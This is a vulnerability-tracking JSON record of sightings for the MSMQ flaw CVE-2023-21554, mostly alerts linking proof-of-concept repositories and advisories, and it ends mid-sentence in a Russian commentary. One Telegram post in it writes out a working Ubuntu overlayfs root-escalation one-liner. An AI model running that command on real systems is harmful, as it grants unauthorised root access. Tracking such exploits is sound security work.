{"vulnerability": "CVE-2023-21554", "sightings": [{"uuid": "25449f71-0348-4ff9-a025-70b36aa90f0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:00.000000Z"}, {"uuid": "2de3b4cc-12d1-45df-8521-bd565c055f3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "ef25298a-5edc-40ec-8ece-a180a393065b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:50.000000Z"}, {"uuid": "e0ca0571-75c3-4dd4-84d3-8ff35d8a91da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://gist.github.com/Darkcrai86/c5e8ba0909b3041ce8ec8cdadd208884", "content": "", "creation_timestamp": "2025-10-27T10:19:18.000000Z"}, {"uuid": "0f209e5f-f595-494b-8e86-342461c88758", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/msmq/cve_2023_21554_queuejumper.rb", "content": "", "creation_timestamp": "2023-09-05T13:26:18.000000Z"}, {"uuid": "e5af0f23-2530-448c-b3e3-3a7e0bffc9b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4220", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ)/QueueJumper\nURL\uff1ahttps://github.com/C3r7/CVE-2023-21554-RCE\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-19T13:32:30.000000Z"}, {"uuid": "d7c6d418-587a-4f24-8453-22c37e165eba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1005", "content": "", "creation_timestamp": "2023-04-12T14:53:28.000000Z"}, {"uuid": "040d2aac-9372-4c11-a294-c02fd6082682", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4170", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper\nURL\uff1ahttps://github.com/select275/CVE-2023-21554-PoC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-13T14:15:46.000000Z"}, {"uuid": "0f29c90f-d46d-4525-973d-7543ec9b33bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4376", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 Windows MessageQueuing PoC\uff0c\u5206\u6790\u89c1 https://www.zoemurmure.top/posts/cve_2023_21554/\nURL\uff1ahttps://github.com/zoemurmure/CVE-2023-21554-PoC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-05-18T10:43:53.000000Z"}, {"uuid": "fe3aa6ff-4951-41af-a7e1-54dec954850d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4202", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ)/QueueJumper\nURL\uff1ahttps://github.com/C00k3rbkr/CVE-2023-21554-RCE\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-17T16:54:57.000000Z"}, {"uuid": "08ee37b4-ab41-4743-8acb-1c60563b376b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4182", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aProof of Concept for Windows Message Queuing also known as CVE-2023-21554\nURL\uff1ahttps://github.com/xhshes/CVE-2023-21554-QueueJumper\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-15T02:26:48.000000Z"}, {"uuid": "4998fb80-59a2-439f-9efd-7d7755625441", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4181", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ)/QueueJumper\nURL\uff1ahttps://github.com/tonarni/CVE-2023-21554-RCE\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-14T17:41:59.000000Z"}, {"uuid": "48b75f8c-4c8d-4834-819d-384e1ce3c5fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4176", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper\nURL\uff1ahttps://github.com/checksec0xint/CVE-2023-21554-PoC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-14T05:22:33.000000Z"}, {"uuid": "27f29ada-f831-4935-a0bf-abad3d4504c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4201", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper\nURL\uff1ahttps://github.com/10xeye/CVE-2023-21554-POC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-17T12:30:44.000000Z"}, {"uuid": "93879791-7f82-4dcb-aa82-a56e7c24ca1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4227", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1ametasploit module for CVE-2023-21554 remote code execution in msmq service which dont require any authentication and user interaction\nURL\uff1ahttps://github.com/g3tS3rvic3s/CVE-2023-21554-RCE-POC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-20T18:14:06.000000Z"}, {"uuid": "9cee0cc0-c97d-437b-998d-83e27858ec4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4226", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper\nURL\uff1ahttps://github.com/g1x-r/CVE-2023-21554-PoC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-20T14:21:31.000000Z"}, {"uuid": "79f0e701-ab28-4e66-a1de-6ae95eb08f5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4162", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aProof-of-Concept for CVE-2023-21554 vulnerability recently discovered in Windows MSMQ\nURL\uff1ahttps://github.com/00hashmaker/CVE-2023-21554-0day\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-12T21:51:51.000000Z"}, {"uuid": "1452f791-1b63-4004-8f7f-d92ad92d0c22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4163", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aPoC for the MSMQ vulnerability recently discovered also known as CVE-2023-21554\nURL\uff1ahttps://github.com/hash0x1/CVE-2023-21554\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-12T22:42:03.000000Z"}, {"uuid": "e7f6e592-f8aa-450b-a6af-1672cc30c460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4185", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ)/QueueJumper\nURL\uff1ahttps://github.com/durte/CVE-2023-21554-RCE\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-15T14:29:49.000000Z"}, {"uuid": "95a42510-d9ee-462b-9e72-a45be399c3d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "Telegram/TFgIrRyFVdmt-_iXx8f0LX8Ka84NvNMzkX0RvLq3uNFE64w", "content": "", "creation_timestamp": "2025-10-10T03:00:06.000000Z"}, {"uuid": "36e7f9f2-06fa-4096-b719-fe83c3fdef7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/bh_cat/202", "content": "\ud83d\udcd5 \u041f\u043e\u0434\u0431\u043e\u0440\u043e\u0447\u043a\u0430 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\udca1 Atlassian Confluence Server - Improper Authorization\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-22518\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c, \u0438\u043c\u0435\u044e\u0449\u0438\u043c \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0443 Confluence, \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0431\u0430\u0437\u0443 \u0434\u0430\u043d\u043d\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 Confluence \u0438, \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\n\ud83d\udca1 Microsoft Message Queuing Remote Code Execution\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-21554\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435: \n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0449\u0435\u043c\u0443 \u0430\u0433\u0435\u043d\u0442\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c RCE-\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430 Microsoft Messaging Queue.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\ud83d\udca1 Google Chrome heap buffer overflow in WebP \n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-4863\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x: \n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n-  \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u044c \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u043f\u0430\u043c\u044f\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u0443\u044e HTML-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\ud83d\udca1 Ubuntu Privilege Escalation (Double)\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-2640\nCVE-2023-32629\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n- \u041d\u0430 \u044f\u0434\u0440\u0430\u0445 Ubuntu, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u043a\u0430\u043a c914c0e27eb0, \u0442\u0430\u043a \u0438 \"UBUNTU: SAUCE: overlayfs: \u041f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0434\u043b\u044f trusted.overlayfs.* xattrs\", \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u043d\u044b\u0435 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u044b \u0434\u043b\u044f \u0441\u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0438\u0445 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0434\u043b\u044f \u0432\u0435\u0440\u0445\u043d\u0438\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0431\u0435\u0437 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u043f\u0440\u043e\u0432\u0435\u0440\u043e\u043a \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n- \u041b\u043e\u043a\u0430\u043b\u044c\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u044f\u0434\u0440\u0430\u0445 Ubuntu \u0412 \u044f\u0434\u0440\u0430\u0445 Ubuntu \u043e\u0432\u0435\u0440\u043b\u0435\u0439\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b ovl_copy_up_meta_inode_data \u043f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u043f\u0440\u0438 \u0432\u044b\u0437\u043e\u0432\u0435 ovl_do_setxattr.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\nunshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\\\"/bin/bash\\\")'\"\n\n#poc", "creation_timestamp": "2023-11-10T11:18:42.000000Z"}, {"uuid": "a61d0762-991d-43e4-ae92-a4b730aaf5d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/302", "content": "Top Security News for 13/04/2023\n\nAn emperical and practical guide to LLM hacking\nhttps://www.reddit.com/r/netsec/comments/12jrurl/an_emperical_and_practical_guide_to_llm_hacking/ \n\nWhy does it take so long for security teams to remediate vulnerabilities?\nhttps://malware.news/t/why-does-it-take-so-long-for-security-teams-to-remediate-vulnerabilities/68702#post_1 \n\nUrgent: Microsoft Issues Patches for 97 Flaws, Including Active Ransomware Exploit\nhttps://thehackernews.com/2023/04/urgent-microsoft-issues-patches-for-97.html \n\nRooting a Common-Criteria Certified Printer to Improve OPSEC\nhttps://www.reddit.com/r/netsec/comments/12jkjeq/rooting_a_commoncriteria_certified_printer_to/ \n\nAI Tasked With 'Destroying Humanity' Now 'Working on Control Over Humanity Through Manipulation'\nhttps://www.vice.com/en_us/article/z3mxe3/ai-tasked-with-destroying-humanity-now-working-on-control-over-humanity-through-manipulation \n\n[CVE-2023-21554] MSMQ (tcp/1801) Remote Code Execution (CVSS 9.8)\nhttps://www.reddit.com/r/netsec/comments/12jet9f/cve202321554_msmq_tcp1801_remote_code_execution/ \n\nAddressing National Cyber Strategy.\nhttps://thecyberwire.com/podcasts/caveat/168/notes \n\nFollowing the Lazarus group by tracking DeathNote campaign\nhttps://www.reddit.com/r/netsec/comments/12jnxa4/following_the_lazarus_group_by_tracking_deathnote/ \n\nQakbot Being Distributed in Korea Through Email Hijacking\nhttps://malware.news/t/qakbot-being-distributed-in-korea-through-email-hijacking/68698#post_1 \n\nBotconf 2023 Wrap-Up Day #1\nhttps://blog.rootshell.be/2023/04/12/botconf-2023-wrap-up-day-1/ \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2023-04-13T07:00:04.000000Z"}, {"uuid": "d33bee6b-8c53-49a0-84cf-a3eb9a01322e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/purple_medved/17", "content": "\u0412 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u043a\u043e\u043c\u0430\u043d\u0434\u044b Check Point \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0442\u0440\u0435\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 MSMQ (Microsoft Message Queuing) MSMQ - \u044d\u0442\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u043e\u0447\u0435\u0440\u0435\u0434\u0438 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u0430\u044f Microsoft \u0432 1999 \u0433\u043e\u0434\u0443, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f \u043f\u043e \u0441\u0435\u0439 \u0434\u0435\u043d\u044c \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0430 \u043d\u0430 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Windows Server. \n\n\u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u0430\u044f  \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 QueueJumper, \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2023-21554 \u0438 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u0438 9.8 CRITICAL \u043f\u043e CVSS3.0 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c Windows Server \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 mqsvc.exe \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 \u043f\u0430\u043a\u0435\u0442 \u0441\u0435\u0440\u0432\u0438\u0441\u0443 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 \u043f\u043e\u0440\u0442\u0443 1801/tcp. \u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u043e\u043a\u043e\u043b\u043e 360,000 